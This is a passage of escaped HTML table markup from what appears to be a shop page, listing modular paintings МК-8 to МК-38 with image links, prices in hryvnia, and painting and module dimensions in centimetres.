alt=\"мк 37\" width=\"200\" height=\"164\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-38.jpg\" alt=\"мк 38\" width=\"200\" height=\"163\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-36</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-37</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-38</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">220грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">220грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">220грн</span></em></span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см): 60х51</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;60х52</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;60х52</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей: 20х45, 20х45, 20х40</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;20х40, 20х45, 20х45</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;20х40, 20х45, 20х45</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-33.jpg\" alt=\"мк 33\" width=\"150\" height=\"159\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-34.jpg\" alt=\"мк 34\" width=\"213\" height=\"147\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-35.jpg\" alt=\"мк 35\" width=\"214\" height=\"141\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-33</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-34</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-35</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">150грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">150грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">150грн</span></em></span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см): 40х53</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см): 65х45</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;65х45</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей: 20х45, 20х45</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей: 45х20, 20х45</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей: 20х45, 45х20</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-30.jpg\" alt=\"мк 30\" width=\"200\" height=\"167\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-31.jpg\" alt=\"мк 31\" width=\"200\" height=\"150\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-32.jpg\" alt=\"мк 32\" width=\"200\" height=\"141\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-30</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-31</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-32</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">150грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">150грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">150грн</span></em></span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см): 53х40</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см): 53х40</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см): 53х40</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей: 45х20, 45х20</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;45х20, 45х20</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;45х20, 45х20</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-27.jpg\" alt=\"мк 27\" width=\"144\" height=\"147\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-28.jpg\" alt=\"мк 28\" width=\"200\" height=\"134\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-29.jpg\" alt=\"мк 29\" width=\"200\" height=\"140\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-27</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-28</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-29</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">280грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">245грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">245грн</span></em></span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 15.4688px;\">\r\n							<td style=\"text-align: center; height: 15.4688px;\">Разм. картины (см): 65х70</td>\r\n							<td style=\"text-align: center; height: 15.4688px;\">Разм. картины (см): 65х70</td>\r\n							<td style=\"text-align: center; height: 15.4688px;\">Разм. картины (см): 65х70</td>\r\n						</tr>\r\n						<tr style=\"height: 15.4688px;\">\r\n							<td style=\"text-align: center; height: 15.4688px;\">Разм. модулей:&nbsp;25х50, 20х65, 20х65</td>\r\n							<td style=\"text-align: center; height: 15.4688px;\">Разм. модулей:25х45, 20х65, 25х30</td>\r\n							<td style=\"text-align: center; height: 15.4688px;\">Разм. модулей:25х30, 20х65,25х45</td>\r\n						</tr>\r\n						<tr style=\"height: 15.4688px;\">\r\n							<td style=\"text-align: center; height: 15.4688px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15.4688px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15.4688px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 15.4688px;\">\r\n							<td style=\"text-align: center; height: 15.4688px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15.4688px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15.4688px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 15.4688px;\">\r\n							<td style=\"text-align: center; height: 15.4688px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15.4688px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15.4688px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 15.4688px;\">\r\n							<td style=\"text-align: center; height: 15.4688px;\"><img src=\"images/modulnie%20kartini/мк-24.jpg\" alt=\"мк 24\" width=\"200\" height=\"127\" /></td>\r\n							<td style=\"text-align: center; height: 15.4688px;\"><img src=\"images/modulnie%20kartini/мк-25.jpg\" alt=\"мк 25\" width=\"200\" height=\"144\" /></td>\r\n							<td style=\"text-align: center; height: 15.4688px;\"><img src=\"images/modulnie%20kartini/мк-26.jpg\" alt=\"мк 26\" width=\"200\" height=\"136\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 15.4688px;\">\r\n							<td style=\"text-align: center; height: 15.4688px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-24</span></strong></td>\r\n							<td style=\"text-align: center; height: 15.4688px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-25</span></strong></td>\r\n							<td style=\"text-align: center; height: 15.4688px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-26</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 15.4688px;\">\r\n							<td style=\"text-align: center; height: 15.4688px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">300грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 15.4688px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">300грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 15.4688px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">300грн</span></em></span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 15.4688px;\">\r\n							<td style=\"text-align: center; height: 15.4688px;\">Разм. картины (см): 92х64</td>\r\n							<td style=\"text-align: center; height: 15.4688px;\">Разм. картины (см): 92х70</td>\r\n							<td style=\"text-align: center; height: 15.4688px;\">Разм. картины (см): 92х70</td>\r\n						</tr>\r\n						<tr style=\"height: 30px;\">\r\n							<td style=\"text-align: center; height: 30px;\">Разм. модулей:20х40, 20х50, 20х40,20х40</td>\r\n							<td style=\"text-align: center; height: 30px;\">Разм. модулей:20х40, 20х50, 20х40,20х40</td>\r\n							<td style=\"text-align: center; height: 30px;\">Разм. модулей:20х40, 20х50, 20х40,20х40</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 157px;\">\r\n							<td style=\"text-align: center; height: 157px;\"><img src=\"images/modulnie%20kartini/мк-21.jpg\" alt=\"мк 21\" width=\"200\" height=\"154\" /></td>\r\n							<td style=\"text-align: center; height: 157px;\"><img src=\"images/modulnie%20kartini/мк-22.jpg\" alt=\"мк 22\" width=\"200\" height=\"142\" /></td>\r\n							<td style=\"text-align: center; height: 157px;\"><img src=\"images/modulnie%20kartini/мк-23.jpg\" alt=\"мк 23\" width=\"200\" height=\"141\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 18px;\">\r\n							<td style=\"text-align: center; height: 18px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-21</span></strong></td>\r\n							<td style=\"text-align: center; height: 18px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-22</span></strong></td>\r\n							<td style=\"text-align: center; height: 18px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-23</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">300грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">300грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">300грн</span></em></span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"text-align: center; height: 15px;\">Разм. картины (см): 92х64</td>\r\n							<td style=\"text-align: center; height: 15px;\">Разм. картины (см):&nbsp;80х55</td>\r\n							<td style=\"text-align: center; height: 15px;\">Разм. картины (см):&nbsp;80х55</td>\r\n						</tr>\r\n						<tr style=\"height: 30px;\">\r\n							<td style=\"text-align: center; height: 30px;\">Разм. модулей:20х40, 20х50, 20х40,20х40</td>\r\n							<td style=\"text-align: center; height: 30px;\">Разм. модулей:,20х40, 20х50, 20х40,20х40</td>\r\n							<td style=\"text-align: center; height: 30px;\">Разм. модулей:,20х50, 20х40, 20х40,20х50</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 137px;\">\r\n							<td style=\"text-align: center; height: 137px;\"><img src=\"images/modulnie%20kartini/мк-18.jpg\" alt=\"мк 18\" width=\"200\" height=\"131\" /></td>\r\n							<td style=\"text-align: center; height: 137px;\"><img src=\"images/modulnie%20kartini/мк-19.jpg\" alt=\"мк 19\" width=\"200\" height=\"106\" /></td>\r\n							<td style=\"text-align: center; height: 137px;\"><img src=\"images/modulnie%20kartini/мк-20.jpg\" alt=\"мк 20\" width=\"200\" height=\"134\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 18px;\">\r\n							<td style=\"text-align: center; height: 18px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-18</span></strong></td>\r\n							<td style=\"text-align: center; height: 18px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-19</span></strong></td>\r\n							<td style=\"text-align: center; height: 18px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-20</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">300грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">300грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">300грн</span></em></span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"text-align: center; height: 15px;\">Разм. картины (см): 87х64</td>\r\n							<td style=\"text-align: center; height: 15px;\">Разм. картины (см): 107х64</td>\r\n							<td style=\"text-align: center; height: 15px;\">Разм. картины (см): 87х63</td>\r\n						</tr>\r\n						<tr style=\"height: 30px;\">\r\n							<td style=\"text-align: center; height: 30px;\">Разм. модулей:20х40, 20х50, 20х50,20х40</td>\r\n							<td style=\"text-align: center; height: 30px;\">Разм. модулей:20х50, 20х50, 20х40,40х20</td>\r\n							<td style=\"text-align: center; height: 30px;\">Разм. модулей:20х50, 20х50, 20х40,20х40</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 152px;\">\r\n							<td style=\"text-align: center; height: 152px;\"><img src=\"images/modulnie%20kartini/мк-15.jpg\" alt=\"мк 15\" width=\"200\" height=\"142\" /></td>\r\n							<td style=\"text-align: center; height: 152px;\"><img src=\"images/modulnie%20kartini/МК-16.jpg\" alt=\"МК 16\" width=\"200\" height=\"149\" /></td>\r\n							<td style=\"text-align: center; height: 152px;\"><img src=\"images/modulnie%20kartini/мк-17.jpg\" alt=\"мк 17\" width=\"200\" height=\"142\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 18px;\">\r\n							<td style=\"text-align: center; height: 18px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-15</span></strong></td>\r\n							<td style=\"text-align: center; height: 18px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-16</span></strong></td>\r\n							<td style=\"text-align: center; height: 18px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-17</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">340грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">340грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">340грн</span></em></span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"text-align: center; height: 15px;\">Разм. картины (см): 113х85</td>\r\n							<td style=\"text-align: center; height: 15px;\">Разм. картины (см): 113х85</td>\r\n							<td style=\"text-align: center; height: 15px;\">Разм. картины (см): 113х85</td>\r\n						</tr>\r\n						<tr style=\"height: 30px;\">\r\n							<td style=\"text-align: center; height: 30px;\">Разм. модулей:25х20, 25х65, 25х65,25х35</td>\r\n							<td style=\"text-align: center; height: 30px;\">Разм. модулей:25х20, 25х65, 25х65,25х35</td>\r\n							<td style=\"text-align: center; height: 30px;\">Разм. модулей:25х20, 25х65, 25х65,25х35</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 15px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 150px;\">\r\n							<td style=\"text-align: center; height: 150px;\"><img src=\"images/modulnie%20kartini/МК-11.jpg\" alt=\"МК 11\" width=\"200\" height=\"147\" /></td>\r\n							<td style=\"text-align: center; height: 150px;\"><img src=\"images/modulnie%20kartini/МК-12.jpg\" alt=\"МК 12\" width=\"200\" height=\"146\" /></td>\r\n							<td style=\"text-align: center; height: 150px;\"><img src=\"images/modulnie%20kartini/МК-14.jpg\" alt=\"МК 14\" width=\"200\" height=\"142\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 18px;\">\r\n							<td style=\"text-align: center; height: 18px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-11</span></strong></td>\r\n							<td style=\"text-align: center; height: 18px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-12</span></strong></td>\r\n							<td style=\"text-align: center; height: 18px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-14</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">340грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">340грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">340грн</span></em></span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"text-align: center; height: 15px;\">Разм. картины (см): 113х85</td>\r\n							<td style=\"text-align: center; height: 15px;\">Разм. картины (см): 113х85</td>\r\n							<td style=\"text-align: center; height: 15px;\">Разм. картины (см): 113х85</td>\r\n						</tr>\r\n						<tr style=\"height: 30px;\">\r\n							<td style=\"text-align: center; height: 30px;\">Разм. модулей:25х20, 25х65, 25х65,25х35</td>\r\n							<td style=\"text-align: center; height: 30px;\">Разм. модулей:25х20, 25х65, 25х65,25х35</td>\r\n							<td style=\"text-align: center; height: 30px;\">Разм. модулей:25х20, 25х65, 25х65,25х35</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 141px;\">\r\n							<td style=\"height: 141px;\"><img src=\"images/modulnie%20kartini/MK-8.jpg\" alt=\"MK 8\" width=\"200\" height=\"102\" /></td>\r\n							<td style=\"height: 141px;\"><img src=\"images/modulnie%20kartini/МК-9.jpg\" alt=\"МК 9\" width=\"200\" height=\"125\" /></td>\r\n							<td style=\"height: 141px;\"><img src=\"images/modulnie%20kartini/МК-10.jpg\" alt=\"МК 10\" width=\"200\" height=\"138\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 18px;\">\r\n							<td style=\"text-align: center; height: 18px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-8</span></strong></td>\r\n							<td style=\"text-align: center; height: 18px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-9</span></strong></td>\r\n							<td style=\"text-align: center; height: 18px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-10</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">300грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">225грн</span></em></span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<em><span style=\"color: #ff0000;\">320грн</span></em></span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"text-align: center; height: 15px;\">Разм. картины (см): 100х50</td>\r\n							<td style=\"text-align: center; height: 15px;\">Разм. картины (см): 90х55</td>\r\n							<td style=\"text-align: center; height: 15px;\">Разм. картины (см): 105х65</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"text-align: center; height: 15px;\">Разм. модулей:35х50, 30х50, 35х50</td>\r\n							<td style=\"text-align: center; height: 15px;\">Разм. модулей:45х45, 45х45</td>\r\n							<td style=\"text-align: center; height: 15px;\">Разм. модулей:30х45, 45х65, 30х45</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 15px;\">\r\n							<td style=\"height: 15px;\">&nbsp;</td>\r\n							<td style=\"height: 